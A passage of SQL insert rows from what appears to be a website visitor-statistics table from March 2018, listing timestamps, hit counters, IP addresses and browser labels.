1520989483,1,1,0,0,'54.36.149.50','other'),(219886,1520989489,1,1,0,0,'34.229.137.99','other'),(219887,1520989677,1,1,0,0,'217.69.133.216','other'),(219888,1520989883,1,1,0,0,'54.236.47.92','other'),(219889,1520990609,1,1,0,0,'54.36.148.84','other'),(219890,1520990610,1,1,0,0,'54.36.148.52','other'),(219891,1520990652,1,1,0,0,'34.229.137.99','other'),(219892,1520990772,1,1,0,0,'54.36.148.78','other'),(219893,1520990934,1,1,0,0,'54.36.148.54','other'),(219894,1520991028,1,1,0,0,'54.236.47.92','other'),(219895,1520991350,1,1,0,0,'178.154.171.60','other'),(219896,1520991378,1,1,0,0,'54.36.149.57','other'),(219897,1520991552,1,1,0,0,'54.36.149.93','other'),(219898,1520991610,1,1,0,0,'34.229.137.99','other'),(219899,1520992346,1,1,0,0,'54.236.47.92','other'),(219900,1520992381,1,1,0,0,'54.36.148.148','other'),(219901,1520992410,1,1,0,0,'91.209.11.236','other'),(219902,1520992690,1,1,0,0,'34.229.137.99','other'),(219903,1520992719,1,1,0,0,'54.36.148.192','other'),(219904,1520992967,1,1,0,0,'54.36.148.204','other'),(219905,1520993008,1,1,0,0,'54.36.148.135','other'),(219906,1520993049,1,1,0,0,'54.36.148.13','other'),(219907,1520993155,1,1,0,0,'54.36.148.221','other'),(219908,1520993260,1,1,0,0,'54.165.59.7','other'),(219909,1520993318,1,0,1,0,'66.249.66.195',''),(219910,1520993423,1,1,0,0,'54.36.148.73','other'),(219911,1520993521,1,1,0,0,'54.36.148.17','other'),(219912,1520993702,1,1,0,0,'54.36.149.11','other'),(219913,1520993743,1,1,0,0,'54.36.148.101','other'),(219914,1520993901,1,1,0,0,'34.229.137.99','other'),(219915,1520993964,1,1,0,0,'54.36.149.92','other'),(219916,1520994047,1,1,0,0,'54.36.149.34','other'),(219917,1520994303,1,1,0,0,'54.36.148.196','other'),(219918,1520994379,1,1,0,0,'54.36.148.45','other'),(219919,1520994586,1,1,0,0,'54.36.148.62','other'),(219920,1520994657,1,1,0,0,'54.36.149.56','other'),(219921,1520994704,1,1,0,0,'54.36.148.58','other'),(219922,1520994758,1,1,0,0,'54.36.148.192','other'),(219923,1520994964,1,1,0,0,'54.36.149.92','other'),(219924,1520995104,1,1,0,0,'34.229.137.99','other'),(219925,1520995210,1,1,0,0,'54.36.148.75','other'),(219926,1520995757,1,1,0,0,'54.236.47.92','other'),(219927,1520996005,1,1,0,0,'87.250.224.46','other'),(219928,1520996008,2,2,0,0,'141.8.142.74','other'),(219929,1520996036,1,1,0,0,'34.229.137.99','other'),(219930,1520996095,1,1,0,0,'54.36.148.106','other'),(219931,1520996145,1,1,0,0,'216.244.66.246','other'),(219932,1520996373,1,1,0,0,'54.36.148.238','other'),(219933,1520996656,1,1,0,0,'54.36.149.33','other'),(219934,1520996697,1,1,0,0,'54.236.47.92','other'),(219935,1520996886,1,1,0,0,'54.36.149.90','other'),(219936,1520996894,1,1,0,0,'54.36.148.76','other'),(219937,1520997120,1,1,0,0,'34.229.137.99','other'),(219938,1520997221,1,1,0,0,'54.36.149.12','other'),(219939,1520997231,1,1,0,0,'54.36.148.49','other'),(219940,1520997702,1,1,0,0,'54.36.148.10','other'),(219941,1520997703,1,1,0,0,'54.36.148.140','other'),(219942,1520997720,1,1,0,0,'54.36.148.60','other'),(219943,1520997731,1,1,0,0,'54.36.148.211','other'),(219944,1520998014,1,1,0,0,'54.36.148.178','other'),(219945,1520998129,1,1,0,0,'54.36.149.54','other'),(219946,1520998133,1,1,0,0,'54.236.47.92','other'),(219947,1520998257,1,1,0,0,'54.36.149.35','other'),(219948,1520998281,1,1,0,0,'54.36.148.101','other'),(219949,1520998306,1,1,0,0,'34.229.137.99','other'),(219950,1520998325,1,1,0,0,'141.8.142.74','other'),(219951,1520998794,1,1,0,0,'54.221.2.178','other'),(219952,1520998863,1,1,0,0,'54.36.148.146','other'),(219953,1520998959,1,1,0,0,'54.36.148.114','other'),(219954,1520998992,1,1,0,0,'8.29.198.27','other'),(219955,1520999330,1,1,0,0,'54.236.47.92','other'),(219956,1520999401,1,1,0,0,'34.229.137.99','other'),(219957,1520999819,1,1,0,0,'54.36.149.86','other'),(219958,1521000039,1,1,0,0,'54.36.148.222','other'),(219959,1521000312,1,1,0,0,'34.229.137.99','other'),(219960,1521000410,1,1,0,0,'54.236.47.92','other'),(219961,1521000464,1,1,0,0,'54.36.148.96','other'),(219962,1521001013,1,1,0,0,'54.36.148.42','other'),(219963,1521001016,1,1,0,0,'178.154.171.88','other'),(219964,1521001129,1,1,0,0,'54.165.59.7','other'),(219965,1521001258,1,1,0,0,'34.229.137.99','other'),(219966,1521002076,1,1,0,0,'54.36.148.73','other'),(219967,1521002086,1,1,0,0,'54.36.149.98','other'),(219968,1521002265,1,1,0,0,'54.236.47.92','other'),(219969,1521002324,1,1,0,0,'54.36.148.42','other'),(219970,1521002337,1,1,0,0,'54.36.148.198','other'),(219971,1521002479,1,1,0,0,'54.36.148.128','other'),(219972,1521002507,1,1,0,0,'54.165.59.7','other'),(219973,1521002940,1,1,0,0,'5.45.207.82','other'),(219974,1521003292,1,1,0,0,'54.236.47.92','other'),(219975,1521003349,1,1,0,0,'34.229.137.99','other'),(219976,1521003815,1,0,1,0,'66.249.66.199',''),(219977,1521004048,1,1,0,0,'54.36.149.46','other'),(219978,1521004090,1,1,0,0,'54.36.148.78','other'),(219979,1521004143,1,1,0,0,'54.36.149.87','other'),(219980,1521004365,1,1,0,0,'54.236.47.92','other'),(219981,1521004488,1,1,0,0,'34.229.137.99','other'),(219982,1521004493,1,1,0,0,'208.110.82.178','other'),(219983,1521004682,1,1,0,0,'141.8.142.74','other'),(219984,1521004685,1,1,0,0,'109.169.46.22','firefox'),(219985,1521005478,1,1,0,0,'34.229.137.99','other'),(219986,1521005490,1,1,0,0,'54.36.148.42','other'),(219987,1521005519,1,1,0,0,'54.236.47.92','other'),(219988,1521006396,1,1,0,0,'54.36.148.217','other'),(219989,1521006718,1,1,0,0,'54.36.148.123','other'),(219990,1521006818,1,0,1,0,'66.249.66.199',''),(219991,1521006968,1,1,0,0,'54.36.148.100','other'),(219992,1521007096,1,1,0,0,'54.36.148.211','other'),(219993,1521007144,1,1,0,0,'54.236.47.92','other'),(219994,1521007148,1,1,0,0,'54.36.149.91','other'),(219995,1521007200,1,1,0,0,'54.165.59.7','other'),(219996,1521007215,1,1,0,0,'34.229.137.99','other'),(219997,1521007330,1,1,0,0,'54.36.149.94','other'),(219998,1521007594,3,3,0,0,'178.154.171.88','other'),(219999,1521007597,9,9,0,0,'141.8.142.74','other'),(220000,1521007615,1,1,0,0,'37.9.113.182','other'),(220001,1521007895,1,1,0,0,'54.36.148.152','other'),(220002,1521007967,2,2,0,0,'77.111.246.7','chrome'),(220003,1521008020,1,1,0,0,'109.169.46.22','chrome'),(220004,1521008021,1,1,0,0,'54.36.148.77','other'),(220005,1521008344,1,1,0,0,'54.36.149.87','other'),(220006,1521008446,1,1,0,0,'54.36.149.9','other'),(220007,1521008596,1,1,0,0,'34.229.137.99','other'),(220008,1521008631,1,1,0,0,'54.36.148.226','other'),(220009,1521008700,1,1,0,0,'54.36.148.235','other'),(220010,1521008716,1,1,0,0,'54.36.148.14','other'),(220011,1521009181,2,2,0,0,'78.111.185.51','chrome'),(220012,1521009189,1,1,0,0,'54.36.149.57','other'),(220013,1521009340,1,1,0,0,'54.36.149.24','other'),(220014,1521009601,1,1,0,0,'34.229.137.99','other'),(220015,1521009743,1,1,0,0,'54.36.149.1','other'),(220016,1521009823,2,2,0,0,'91.196.177.46','chrome'),(220017,1521009834,1,1,0,0,'8.29.198.26','other'),(220018,1521009863,1,0,1,0,'66.249.66.199',''),(220019,1521010087,1,1,0,0,'54.36.149.99','other'),(220020,1521010131,3,3,0,0,'91.196.178.164','chrome'),(220021,1521010187,1,1,0,0,'54.36.148.194','other'),(220022,1521010322,1,1,0,0,'54.36.148.204','other'),(220023,1521010585,1,1,0,0,'91.229.121.3','chrome'),(220024,1521011091,1,1,0,0,'54.36.148.49','other'),(220025,1521011146,1,1,0,0,'87.250.224.46','other'),(220026,1521011362,1,1,0,0,'54.36.149.11','other'),(220027,1521011467,1,1,0,0,'216.244.66.237','other'),(220028,1521011551,1,1,0,0,'54.36.149.86','other'),(220029,1521011786,1,0,1,0,'66.249.66.195',''),(220030,1521011807,1,1,0,0,'34.229.137.99','other'),(220031,1521011826,4,4,0,0,'46.133.195.227','chrome'),(220032,1521011868,1,1,0,0,'54.36.148.76','other'),(220033,1521011907,1,1,0,0,'37.55.56.67','chrome'),(220034,1521012174,1,1,0,0,'54.36.148.194','other'),(220035,1521012457,1,1,0,0,'95.132.7.134','firefox'),(220036,1521012611,1,1,0,0,'54.36.149.19','other'),(220037,1521012717,1,1,0,0,'54.36.148.220','other'),(220038,1521013038,1,1,0,0,'34.229.137.99','other'),(220039,1521013124,1,1,0,0,'91.209.11.236','other'),(220040,1521013305,1,1,0,0,'54.36.148.78','other'),(220041,1521013323,1,1,0,0,'91.196.178.90','chrome'),(220042,1521013330,2,2,0,0,'141.8.142.74','other'),(220043,1521013468,1,1,0,0,'54.36.148.13','other'),(220044,1521013673,1,1,0,0,'176.98.70.92','chrome'),(220045,1521014031,1,1,0,0,'34.229.137.99','other'),(220046,1521014299,1,1,0,0,'54.36.148.216','other'),(220047,1521014407,1,1,0,0,'109.169.46.22','chrome'),(220048,1521014565,1,1,0,0,'54.36.148.23','other'),(220049,1521014683,1,1,0,0,'82.207.91.234','other'),(220050,1521014777,2,2,0,0,'195.230.119.34','chrome'),(220051,1521014850,1,1,0,0,'37.55.243.7','chrome'),(220052,1521015045,2,2,0,0,'178.154.171.88','other'),(220053,1521015262,1,1,0,0,'54.36.148.214','other'),(220054,1521015325,2,2,0,0,'91.196.178.164','chrome'),(220055,1521015403,1,1,0,0,'95.135.27.0','chrome'),(220056,1521015721,1,1,0,0,'54.36.148.179','other'),(220057,1521015961,1,1,0,0,'34.229.137.99','other'),(220058,1521016354,1,1,0,0,'54.36.148.24','other'),(220059,1521016370,1,1,0,0,'54.36.148.242','other'),(220060,1521016415,1,1,0,0,'46.133.195.227','chrome'),(220061,1521016456,1,1,0,0,'91.196.179.138','chrome'),(220062,1521016484,1,1,0,0,'5.3.165.95','chrome'),(220063,1521016838,2,2,0,0,'141.8.142.74','other'),(220064,1521016874,1,1,0,0,'54.36.148.32','other'),(220065,1521016983,1,1,0,0,'87.250.224.46','other'),(220066,1521017058,1,1,0,0,'34.229.137.99','other'),(220067,1521017137,1,1,0,0,'54.36.148.133','other'),(220068,1521017140,1,1,0,0,'37.9.113.182','other'),(220069,1521017235,3,3,0,0,'91.196.178.129','chrome'),(220070,1521017292,1,1,0,0,'80.252.155.198','firefox'),(220071,1521017466,1,1,0,0,'54.36.148.182','other'),(220072,1521017498,1,0,1,0,'66.249.66.199',''),(220073,1521017854,1,1,0,0,'207.154.247.202','chrome'),(220074,1521018145,1,0,1,0,'66.249.66.201',''),(220075,1521018447,2,2,0,0,'78.111.185.51','chrome'),(220076,1521018500,1,1,0,0,'34.229.137.99','other'),(220077,1521018660,1,0,1,0,'66.249.66.158',''),(220078,1521019309,1,1,0,0,'46.211.108.254','other'),(220079,1521019386,1,1,0,0,'54.36.148.133','other'),(220080,1521019727,1,1,0,0,'54.36.148.149','other'),(220081,1521019851,1,1,0,0,'34.229.137.99','other'),(220082,1521020054,1,1,0,0,'46.211.112.152','other'),(220083,1521020338,1,1,0,0,'54.36.148.223','other'),(220084,1521020474,1,1,0,0,'54.36.148.156','other'),(220085,1521020684,1,1,0,0,'8.29.198.26','other'),(220086,1521020697,1,1,0,0,'54.36.148.57','other'),(220087,1521020789,1,0,1,0,'66.249.66.199',''),(220088,1521021233,1,1,0,0,'87.250.224.46','other'),(220089,1521021386,1,1,0,0,'54.36.148.137','other'),(220090,1521021491,1,1,0,0,'193.227.119.23','chrome'),(220091,1521021680,1,1,0,0,'178.154.171.88','other'),(220092,1521021860,2,2,0,0,'78.111.185.51','chrome'),(220093,1521021972,1,1,0,0,'54.36.149.26','other'),(220094,1521022014,1,1,0,0,'34.229.137.99','other'),(220095,1521022016,1,1,0,0,'54.36.148.175','other'),(220096,1521022504,1,1,0,0,'54.36.148.134','other'),(220097,1521022701,1,1,0,0,'54.36.148.60','other'),(220098,1521022793,1,1,0,0,'40.77.167.182','other'),(220099,1521022996,1,1,0,0,'34.229.137.99','other'),(220100,1521023219,1,1,0,0,'46.211.108.61','other'),(220101,1521023954,1,1,0,0,'109.169.46.22','firefox'),(220102,1521023990,1,1,0,0,'34.229.137.99','other'),(220103,1521024148,1,0,1,0,'66.249.66.199',''),(220104,1521024297,1,1,0,0,'54.36.148.234','other'),(220105,1521024585,1,1,0,0,'95.133.29.215','chrome'),(220106,1521024857,1,1,0,0,'54.36.148.137','other'),(220107,1521024963,1,1,0,0,'54.36.148.90','other'),(220108,1521025283,1,1,0,0,'141.8.142.74','other'),(220109,1521025668,1,1,0,0,'91.196.177.147','chrome'),(220110,1521025773,1,1,0,0,'54.36.148.195','other'),(220111,1521025806,1,0,1,0,'66.249.66.195',''),(220112,1521025824,1,0,1,0,'66.249.66.199',''),(220113,1521025904,1,1,0,0,'54.36.148.47','other'),(220114,1521026294,1,0,1,0,'66.249.66.201',''),(220115,1521027046,1,1,0,0,'37.55.226.82','chrome'),(220116,1521027308,1,1,0,0,'54.36.149.2','other'),(220117,1521027330,1,1,0,0,'54.36.149.59','other'),(220118,1521027519,1,1,0,0,'34.229.137.99','other'),(220119,1521027678,1,1,0,0,'91.196.178.104','chrome'),(220120,1521027802,1,1,0,0,'95.132.7.134','firefox'),(220121,1521028281,1,1,0,0,'54.36.148.212','other'),(220122,1521028585,1,1,0,0,'54.36.149.91','other'),(220123,1521028778,1,1,0,0,'54.36.149.48','other'),(220124,1521028818,1,1,0,0,'178.154.171.88','other'),(220125,1521028828,1,1,0,0,'141.8.142.74','other'),(220126,1521029028,2,2,0,0,'91.196.179.25','chrome'),(220127,1521029054,1,1,0,0,'54.36.149.44','other'),(220128,1521029060,1,1,0,0,'77.111.244.15','chrome'),(220129,1521029109,1,1,0,0,'34.229.137.99','other'),(220130,1521029138,1,1,0,0,'54.198.11.210','other'),(220131,1521029390,1,1,0,0,'95.132.7.134','firefox'),(220132,1521029489,2,2,0,0,'216.244.66.246','other'),(220133,1521029527,1,1,0,0,'54.36.148.65','other'),(220134,1521029564,2,2,0,0,'188.163.17.36','chrome'),(220135,1521029728,1,0,1,0,'66.249.66.195',''),(220136,1521029766,1,1,0,0,'54.36.149.47','other'),(220137,1521030039,1,1,0,0,'176.111.33.18','chrome'),(220138,1521030117,1,1,0,0,'34.229.137.99','other'),(220139,1521030152,1,1,0,0,'216.244.66.194','other'),(220140,1521030332,1,1,0,0,'54.198.11.210','other'),(220141,1521031072,1,1,0,0,'54.36.148.248','other'),(220142,1521031241,1,1,0,0,'77.111.244.19','chrome'),(220143,1521031312,1,1,0,0,'54.198.11.210','other'),(220144,1521031462,1,1,0,0,'54.36.149.64','other'),(220145,1521031507,2,2,0,0,'94.153.229.229','opera'),(220146,1521031556,1,1,0,0,'8.29.198.26','other'),(220147,1521031643,1,1,0,0,'54.36.148.167','other'),(220148,1521031646,2,2,0,0,'91.196.178.93','chrome'),(220149,1521031812,1,1,0,0,'54.36.148.84','other'),(220150,1521031823,1,1,0,0,'54.36.149.39','other'),(220151,1521032324,1,1,0,0,'54.36.149.19','other'),(220152,1521032437,1,1,0,0,'34.229.137.99','other'),(220153,1521032474,1,1,0,0,'54.36.149.29','other'),(220154,1521032500,1,1,0,0,'54.36.149.95','other'),(220155,1521032597,2,2,0,0,'130.180.220.140','chrome'),(220156,1521032652,1,1,0,0,'54.36.148.40','other'),(220157,1521032675,1,1,0,0,'54.36.149.85','other'),(220158,1521033058,1,0,1,0,'66.249.66.199',''),(220159,1521033099,1,1,0,0,'37.9.113.182','other'),(220160,1521033199,1,1,0,0,'46.161.9.56','chrome'),(220161,1521033462,1,1,0,0,'109.169.46.22','chrome'),(220162,1521033476,1,1,0,0,'34.229.137.99','other'),(220163,1521033516,1,1,0,0,'54.36.148.12','other'),(220164,1521033551,1,1,0,0,'54.36.148.88','other'),(220165,1521033919,1,1,0,0,'54.36.149.96','other'),(220166,1521034644,1,1,0,0,'78.137.2.130','chrome'),(220167,1521034757,1,1,0,0,'54.36.148.61','other'),(220168,1521035105,1,1,0,0,'77.111.244.19','chrome'),(220169,1521035433,2,2,0,0,'141.8.142.74','other'),(220170,1521035469,1,1,0,0,'54.36.148.165','other'),(220171,1521035574,1,1,0,0,'54.36.148.108','other'),(220172,1521035753,1,1,0,0,'207.46.13.72','other'),(220173,1521035846,2,2,0,0,'91.196.178.161','chrome'),(220174,1521036099,1,1,0,0,'54.36.148.251','other'),(220175,1521036519,1,1,0,0,'34.229.137.99','other'),(220176,1521036706,1,1,0,0,'54.36.149.6','other'),(220177,1521036726,1,1,0,0,'54.36.148.212','other'),(220178,1521036993,1,1,0,0,'141.8.142.74','other'),(220179,1521037233,1,1,0,0,'54.36.149.95','other'),(220180,1521037331,1,1,0,0,'178.255.215.94','other'),(220181,1521037626,1,1,0,0,'34.229.137.99','other'),(220182,1521037977,1,1,0,0,'54.198.11.210','other'),(220183,1521038006,1,1,0,0,'193.194.127.207','chrome'),(220184,1521038034,1,1,0,0,'54.36.148.96','other'),(220185,1521038114,1,1,0,0,'54.36.148.187','other'),(220186,1521038822,1,1,0,0,'91.124.182.170','firefox'),(220187,1521038836,1,1,0,0,'34.229.137.99','other'),(220188,1521038923,3,3,0,0,'46.133.5.218','chrome'),(220189,1521038978,1,1,0,0,'176.107.196.32','firefox'),(220190,1521039116,1,1,0,0,'178.154.171.88','other'),(220191,1521039117,1,1,0,0,'141.8.142.74','other'),(220192,1521039239,3,3,0,0,'37.54.114.62','chrome'),(220193,1521039513,1,1,0,0,'54.198.11.210','other'),(220194,1521039748,1,1,0,0,'107.167.109.23','other'),(220195,1521039908,1,1,0,0,'91.124.182.170','firefox'),(220196,1521040109,1,1,0,0,'207.46.13.72','other'),(220197,1521040268,1,1,0,0,'46.161.9.56','chrome'),(220198,1521040446,1,1,0,0,'54.36.148.108','other'),(220199,1521040462,9,9,0,0,'141.8.142.74','other'),(220200,1521040466,4,4,0,0,'178.154.171.88','other'),(220201,1521040664,1,1,0,0,'87.250.224.46','other'),(220202,1521040691,1,1,0,0,'37.9.113.182','other'),(220203,1521040727,1,1,0,0,'54.36.148.17','other'),(220204,1521040999,1,1,0,0,'66.249.66.158','chrome'),(220205,1521041254,1,1,0,0,'34.229.137.99','other'),(220206,1521041516,1,1,0,0,'91.196.178.87','firefox'),(220207,1521041622,1,1,0,0,'54.36.149.7','other'),(220208,1521041707,1,1,0,0,'54.36.148.35','other'),(220209,1521041835,1,1,0,0,'141.8.142.74','other'),(220210,1521041905,1,1,0,0,'54.36.149.104','other'),(220211,1521041942,1,1,0,0,'54.36.149.23','other'),(220212,1521041949,1,1,0,0,'54.36.148.157','other'),(220213,1521042073,1,1,0,0,'54.36.148.41','other'),(220214,1521042113,2,0,2,0,'66.249.66.195',''),(220215,1521042405,1,1,0,0,'8.29.198.26','other'),(220216,1521042487,1,1,0,0,'91.124.182.170','firefox'),(220217,1521042717,1,1,0,0,'54.36.148.53','other'),(220218,1521042851,1,1,0,0,'54.36.148.210','other'),(220219,1521043012,1,1,0,0,'188.255.19.29','msie'),(220220,1521043021,1,0,1,0,'66.249.66.213',''),(220221,1521043159,1,1,0,0,'54.36.149.96','other'),(220222,1521043202,1,1,0,0,'141.8.142.74','other'),(220223,1521043618,1,1,0,0,'54.36.148.109','other'),(220224,1521043683,1,1,0,0,'34.229.137.99','other'),(220225,1521043719,1,1,0,0,'54.36.149.38','other'),(220226,1521043940,1,1,0,0,'54.36.148.230','other'),(220227,1521044002,1,1,0,0,'188.230.43.254','other'),(220228,1521044055,1,0,1,0,'66.249.66.199',''),(220229,1521044129,1,1,0,0,'54.36.148.94','other'),(220230,1521044138,1,1,0,0,'46.133.252.226','chrome'),(220231,1521044470,1,0,1,0,'66.249.66.201',''),(220232,1521044726,1,1,0,0,'141.8.142.74','other'),(220233,1521045071,1,1,0,0,'54.36.149.17','other'),(220234,1521045244,1,1,0,0,'54.36.149.95','other'),(220235,1521045478,1,1,0,0,'40.77.167.126','other'),(220236,1521045911,2,1,1,0,'66.249.66.157',''),(220237,1521045968,1,1,0,0,'91.227.69.33','chrome'),(220238,1521046400,1,1,0,0,'188.230.43.254','other'),(220239,1521046413,2,0,2,0,'66.249.66.195',''),(220240,1521046435,2,2,0,0,'46.133.185.55','chrome'),(220241,1521046477,1,0,1,0,'66.249.66.201',''),(220242,1521046878,1,1,0,0,'54.36.148.193','other'),(220243,1521046883,1,1,0,0,'54.36.149.83','other'),(220244,1521046928,1,0,1,0,'66.249.66.199',''),(220245,1521046991,1,1,0,0,'54.36.148.23','other'),(220246,1521047339,1,1,0,0,'34.229.137.99','other'),(220247,1521047457,1,1,0,0,'54.36.149.76','other'),(220248,1521047635,4,1,3,0,'66.249.66.195',''),(220249,1521047728,1,1,0,0,'54.36.148.199','other'),(220250,1521047831,1,1,0,0,'54.36.148.59','other'),(220251,1521048002,1,1,0,0,'178.92.205.79','chrome'),(220252,1521048101,1,1,0,0,'54.36.149.85','other'),(220253,1521048408,1,1,0,0,'34.229.137.99','other'),(220254,1521048415,2,2,0,0,'54.36.148.81','other'),(220255,1521048747,1,1,0,0,'54.36.149.100','other'),(220256,1521048799,1,1,0,0,'188.230.43.254','other'),(220257,1521048857,1,1,0,0,'54.36.148.237','other'),(220258,1521048920,1,0,1,0,'66.249.66.199',''),(220259,1521049029,1,1,0,0,'54.36.148.198','other'),(220260,1521049183,1,1,0,0,'40.77.167.53','other'),(220261,1521049441,3,3,0,0,'141.8.142.74','other'),(220262,1521049482,2,0,2,0,'66.249.66.158',''),(220263,1521049571,2,1,1,0,'66.249.66.213',''),(220264,1521049588,1,1,0,0,'54.36.148.54','other'),(220265,1521049833,1,1,0,0,'178.154.171.88','other'),(220266,1521050041,1,1,0,0,'54.36.149.11','other'),(220267,1521050439,1,1,0,0,'217.69.133.224','other'),(220268,1521050520,1,1,0,0,'54.36.148.167','other'),(220269,1521050601,1,0,1,0,'66.249.66.195',''),(220270,1521050861,1,1,0,0,'180.76.15.29','other'),(220271,1521050954,1,1,0,0,'54.36.149.10','other'),(220272,1521051024,1,1,0,0,'54.36.148.193','other'),(220273,1521051381,1,1,0,0,'54.36.148.39','other'),(220274,1521051716,1,1,0,0,'54.88.210.88','other'),(220275,1521052196,1,0,1,0,'66.249.66.201',''),(220276,1521052560,1,1,0,0,'217.69.133.11','other'),(220277,1521052606,1,1,0,0,'54.36.148.98','other'),(220278,1521052639,1,1,0,0,'54.88.210.88','other'),(220279,1521053242,1,1,0,0,'8.29.198.27','other'),(220280,1521053254,1,1,0,0,'40.77.167.126','other'),(220281,1521053424,1,1,0,0,'216.244.66.246','other'),(220282,1521053562,1,1,0,0,'54.88.210.88','other'),(220283,1521053573,1,1,0,0,'54.36.148.166','other'),(220284,1521053591,1,1,0,0,'54.36.149.88','other'),(220285,1521053601,1,1,0,0,'54.36.149.64','other'),(220286,1521053606,1,0,1,0,'66.249.66.211',''),(220287,1521053816,1,1,0,0,'54.36.148.34','other'),(220288,1521054466,1,1,0,0,'54.88.210.88','other'),(220289,1521054777,1,1,0,0,'54.36.149.41','other'),(220290,1521054827,2,2,0,0,'91.196.178.4','chrome'),(220291,1521054837,1,1,0,0,'54.36.148.164','other'),(220292,1521054884,1,0,1,0,'66.249.66.74',''),(220293,1521055302,1,1,0,0,'217.69.136.204','other'),(220294,1521055368,1,1,0,0,'54.88.210.88','other'),(220295,1521055557,1,0,1,0,'66.249.66.157',''),(220296,1521056250,3,3,0,0,'141.8.142.74','other'),(220297,1521056291,1,1,0,0,'54.88.210.88','other'),(220298,1521056296,1,1,0,0,'54.36.148.170','other'),(220299,1521056649,1,0,1,0,'66.249.66.201',''),(220300,1521056814,1,1,0,0,'54.36.148.114','other'),(220301,1521056861,1,1,0,0,'54.36.148.214','other'),(220302,1521057056,1,0,1,0,'66.249.66.195',''),(220303,1521057074,1,0,1,0,'66.249.66.158',''),(220304,1521057111,1,1,0,0,'54.36.148.128','other'),(220305,1521057212,1,1,0,0,'54.88.210.88','other'),(220306,1521057250,1,1,0,0,'91.196.178.169','chrome'),(220307,1521057387,1,1,0,0,'54.36.148.203','other'),(220308,1521057465,1,1,0,0,'54.36.149.84','other'),(220309,1521057752,1,1,0,0,'54.36.148.107','other'),(220310,1521058130,1,1,0,0,'54.36.148.124','other'),(220311,1521058209,1,1,0,0,'54.88.210.88','other'),(220312,1521058288,1,0,1,0,'66.249.66.201',''),(220313,1521058289,1,1,0,0,'141.8.142.74','other'),(220314,1521058328,1,1,0,0,'5.1.21.89','firefox'),(220315,1521058484,1,1,0,0,'87.250.224.46','other'),(220316,1521058596,1,1,0,0,'54.36.148.75','other'),(220317,1521058680,1,1,0,0,'54.36.149.3','other'),(220318,1521058684,1,1,0,0,'54.36.148.117','other'),(220319,1521058785,1,1,0,0,'54.36.148.121','other'),(220320,1521058897,2,2,0,0,'91.196.178.55','chrome'),(220321,1521059030,1,1,0,0,'54.36.149.63','other'),(220322,1521059169,1,1,0,0,'54.36.148.241','other'),(220323,1521059190,1,1,0,0,'54.88.210.88','other'),(220324,1521059317,1,1,0,0,'54.36.148.231','other'),(220325,1521059874,1,1,0,0,'54.36.149.58','other'),(220326,1521060018,1,0,1,0,'66.249.66.195',''),(220327,1521060134,1,1,0,0,'54.88.210.88','other'),(220328,1521060765,1,1,0,0,'54.36.149.59','other'),(220329,1521060776,1,0,1,0,'66.249.66.199',''),(220330,1521060836,1,1,0,0,'54.36.148.162','other'),(220331,1521061050,1,1,0,0,'54.36.148.109','other'),(220332,1521061059,1,1,0,0,'54.88.210.88','other'),(220333,1521061282,1,1,0,0,'54.36.148.31','other'),(220334,1521061306,1,1,0,0,'54.36.149.45','other'),(220335,1521061512,2,2,0,0,'92.112.124.65','chrome'),(220336,1521061621,1,1,0,0,'54.36.148.107','other'),(220337,1521061681,1,1,0,0,'54.36.148.143','other'),(220338,1521061747,1,1,0,0,'54.36.148.163','other'),(220339,1521061801,1,1,0,0,'54.36.149.90','other'),(220340,1521061814,1,1,0,0,'54.36.149.68','other'),(220341,1521061953,1,1,0,0,'54.36.148.177','other'),(220342,1521061998,2,2,0,0,'141.8.142.74','other'),(220343,1521062056,1,1,0,0,'54.88.210.88','other'),(220344,1521062079,2,0,2,0,'66.249.66.195',''),(220345,1521062325,1,1,0,0,'54.36.149.20','other'),(220346,1521062467,1,0,1,0,'66.249.66.199',''),(220347,1521062753,1,1,0,0,'54.36.148.227','other'),(220348,1521062811,1,1,0,0,'66.249.66.158','chrome'),(220349,1521062822,1,1,0,0,'66.249.66.199','chrome'),(220350,1521062929,1,1,0,0,'54.36.149.82','other'),(220351,1521063005,1,1,0,0,'54.88.210.88','other'),(220352,1521063237,1,1,0,0,'54.36.148.173','other'),(220353,1521063314,1,0,1,0,'66.249.66.201',''),(220354,1521063658,1,1,0,0,'54.36.148.31','other'),(220355,1521063895,1,1,0,0,'54.36.148.97','other'),(220356,1521063914,1,1,0,0,'54.88.210.88','other'),(220357,1521064086,1,1,0,0,'8.29.198.25','other'),(220358,1521064304,1,1,0,0,'54.36.148.126','other'),(220359,1521064805,1,1,0,0,'54.197.45.201','other'),(220360,1521064839,1,1,0,0,'54.88.210.88','other'),(220361,1521064853,1,1,0,0,'54.36.148.105','other'),(220362,1521065260,1,1,0,0,'54.36.148.194','other'),(220363,1521065584,1,0,1,0,'66.249.66.201',''),(220364,1521065757,1,1,0,0,'54.88.210.88','other'),(220365,1521065778,1,1,0,0,'91.199.194.41','chrome'),(220366,1521065826,1,1,0,0,'54.197.45.201','other'),(220367,1521065895,1,1,0,0,'178.154.171.88','other'),(220368,1521065947,1,1,0,0,'54.36.149.29','other'),(220369,1521066471,1,1,0,0,'54.36.148.135','other'),(220370,1521066673,1,1,0,0,'54.88.210.88','other'),(220371,1521066741,1,1,0,0,'54.197.45.201','other'),(220372,1521066764,1,0,1,0,'66.249.66.199',''),(220373,1521066769,1,1,0,0,'54.36.149.30','other'),(220374,1521067484,1,1,0,0,'54.36.148.13','other'),(220375,1521067591,1,1,0,0,'54.88.210.88','other'),(220376,1521067668,1,1,0,0,'54.197.45.201','other'),(220377,1521068017,1,0,1,0,'66.249.66.158',''),(220378,1521068025,1,1,0,0,'54.36.148.126','other'),(220379,1521068108,1,0,1,0,'66.249.66.156',''),(220380,1521068392,1,0,1,0,'66.249.66.201',''),(220381,1521068416,1,0,1,0,'66.249.66.199',''),(220382,1521068516,1,1,0,0,'54.88.210.88','other'),(220383,1521068575,1,1,0,0,'54.197.45.201','other'),(220384,1521068700,1,1,0,0,'178.154.171.88','other'),(220385,1521069026,1,1,0,0,'54.36.149.107','other'),(220386,1521069164,1,0,1,0,'66.249.66.156',''),(220387,1521069218,1,1,0,0,'54.36.148.44','other'),(220388,1521069376,1,1,0,0,'54.36.148.114','other'),(220389,1521069554,1,1,0,0,'54.197.45.201','other'),(220390,1521069972,1,1,0,0,'54.36.148.239','other'),(220391,1521070003,1,1,0,0,'54.36.148.196','other'),(220392,1521070034,1,1,0,0,'54.36.148.188','other'),(220393,1521070210,1,1,0,0,'54.36.148.84','other'),(220394,1521070219,1,1,0,0,'54.36.148.231','other'),(220395,1521070529,1,1,0,0,'54.197.45.201','other'),(220396,1521070614,1,1,0,0,'54.36.149.35','other'),(220397,1521070780,1,1,0,0,'54.36.149.34','other'),(220398,1521070974,1,0,1,0,'66.249.66.201',''),(220399,1521071014,1,